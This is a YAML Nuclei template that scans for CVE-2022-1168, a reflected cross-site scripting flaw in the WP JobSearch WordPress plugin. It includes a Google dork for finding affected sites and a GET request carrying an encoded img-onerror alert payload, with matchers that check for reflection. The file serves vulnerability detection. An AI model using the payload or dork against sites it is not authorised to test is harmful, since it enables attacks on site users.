nuclei-templates/http/cves/2022/CVE-2022-1168.yaml

56 lines
2.1 KiB
YAML

id: CVE-2022-1168
info:
name: WordPress WP JobSearch <1.5.1 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: |
Update to the latest version of the WP JobSearch plugin (1.5.1 or higher) to mitigate the XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1168
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40139
cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: eyecix
product: jobsearch_wp_job_board
framework: wordpress
google-query: inurl:"wp-content/plugins/wp-jobsearch"
tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix
http:
- method: GET
path:
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(domain)>"
- "wp-jobsearch"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 404
# digest: 4b0a00483046022100d6567f0fa62a66a2168bac521adec3b0d1f2b8d818b35637c7fc5cfe5441bca0022100be2b2c34efd5340566c5eac138d7530b4d7a9b2f2c4760e916fc820a467b3b98:922c64590222798bb761d5b6d8e72950